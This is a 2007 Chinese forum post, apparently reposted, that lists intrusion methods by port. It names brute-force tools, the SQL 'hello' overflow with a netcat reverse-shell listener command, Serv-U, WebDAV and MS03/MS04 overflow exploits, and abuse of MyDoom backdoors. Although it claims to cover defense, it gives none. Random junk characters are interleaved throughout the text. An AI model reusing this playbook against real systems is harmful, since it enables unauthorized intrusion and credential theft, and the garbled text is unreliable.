 该用户从未签到
|
工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。
* C+ Y! b0 v4 T+ B2 t & ]( @' E9 }2 w. h: g5 l
, `% U; F2 R7 H* p1 R
1. 1433端口入侵 5 S }6 `: B, s# F
2 C# \' t# V$ ~% [7 l' g9 x scanport.exe 查有1433的机器
( L n" f2 X5 ?8 {% X' G2 p9 B8 ^* ^; [4 n, S3 Q3 ]
SQLScanPass.exe 进行字典暴破(字典是关键) 9 @2 d) R6 D2 ^( c
' x8 w, B$ G- b- O" _
最后 SQLTools.exe入侵
1 _% r' p% ~! S7 K7 n( l7 H% v. B$ r( C
=============================
' H* Y7 R3 j0 B3 M o8 B) ]. y
/ x0 H1 E0 s* X 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
5 C9 y$ _0 g! l+ e- y" u; [
! V5 y! J: i& b$ z. T nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
& T0 f4 m4 i1 \0 U0 r5 |: ~* M v K d# D0 e" n
(以上反向的,测试成功) ! i$ w0 n4 Y7 |- r* Y" x* [+ ~4 g
& j9 I' V6 t3 U2 J4 y8 T1 X& c
sqlhelloz.exe 入侵ip 1433 (这个是正向连接) ! B o& O5 F+ m$ g8 w1 h
5 ?: f8 D$ P) q4 W0 s 2. 4899端口入侵 " b4 \* v N: E& f
/ T6 P% o1 a/ G' D" P3 R# E+ ` 用4899过滤器.exe,扫描空口令的机器 0 O# `, R# ?3 M4 [3 _, g ?$ u
$ n% c3 n& l- ]: u) S0 F
3. 3899的入侵 " Q( u7 ]( i8 _) K# T J2 g
! C1 i* N3 r" J9 I4 t# y
对很早的机器,可以试试3389的溢出(win3389ex.exe)
! E) P \3 l8 p: }
- Q E) a8 u; ?4 y% x! A; T1 v5 C 对2000的机器,可以试试字典暴破。(tscrack.exe)
, E$ O0 E) \7 R8 ?
1 [3 \' \) K# ?( h 4. 80入侵 - D5 D3 Z( X: x3 F% w u, ^ t( y4 M
& C8 n' |6 o" s4 b$ o9 E2 G+ w4 N1 w
对sp3以前的机器,可以用webdav入侵;
" M: N: e6 e* s$ ^* K6 S. J- r
+ T9 }8 l$ `2 K- `" ~# f( S' i* ^ 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
3 l( Y+ F& k9 D2 z4 ?3 P8 B6 J" s8 G. C+ h: h
可以利用SQL进行注入。(小榕的注入软件)。
0 F2 }3 N4 l( _/ }9 N, |3 ^+ Y5 T) D3 E8 k- O' B" R
5. serv-u入侵(21端口) 0 m9 R0 k# h8 I' I
4 H9 a4 i6 w- o) b' ?$ |) E 对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
( ^/ p' j) w0 s5 I
& T8 k4 [; v0 {0 W# U r$ v 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 4 g. H4 v/ S0 R8 W8 e7 B, {
/ l t2 H4 P0 \0 m% i) U, ] ====================================== $ `5 |3 z" r0 C3 {
3 T3 X z$ |* w9 \. I, i8 [( y8 c
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
. n7 D0 X0 v6 P, ?+ D3 |
. {7 U( f" L- K 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
- p1 X" |' H+ ?( A$ i; L# \ 8 x$ G# f' @. q3 F8 X/ L9 B
6. 554端口
* u0 t% Q$ l7 k3 Z! q) U
+ o$ I' {; G, \& {6 t 用real554.exe入侵。
6 @+ e, Q* g% B: c& Y' `, [1 O 4 e5 ~$ b& {1 W R$ R( B! F& g& E. A
7. 6129端口
1 ~# D Y8 {5 I- P0 p# k; M
, f" n( V9 F& d; x, ] 用DameWare6129.exe入侵。
1 U9 _6 O- l) ]% i! B; ?# U3 J+ R. I* [: U5 F
8. 系统漏洞
4 }' I! d K/ ]/ t6 Y1 Q1 s4 k* t# V
D8 M9 o3 J* I3 r+ @, d) ] 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
$ M, u; T1 M3 T, D+ N6 a* K/ Y2 M
9 C. G) l! l* g9 {8 Q8 m 进行溢出入侵。 , d% f9 q! B/ L' g, Z s* H
p8 e; h: y! d& p8 I/ I 9. 3127等端口 # w5 G+ \4 u0 r$ M( j" X% Z; ?
( I- x, O a$ p# { 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
! F8 \& _% w: M( A+ H# g( V5 ?& f. q6 j/ ]7 P7 F$ c
10. 其他入侵 6 Y5 |2 h+ {! |+ p
6 Z) e0 R' f) x9 C" d; p& G! @ P
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
1 ^3 H0 I& ~2 V* Q9 D; c w3 [) Y' F' @) l% x
| 转自杜松论坛:http://www.juniperbbs.net/index.php |
|
|
/1 
IP卡
狗仔卡
发表于 2007-12-17 01:04:27
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
转发到微博
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
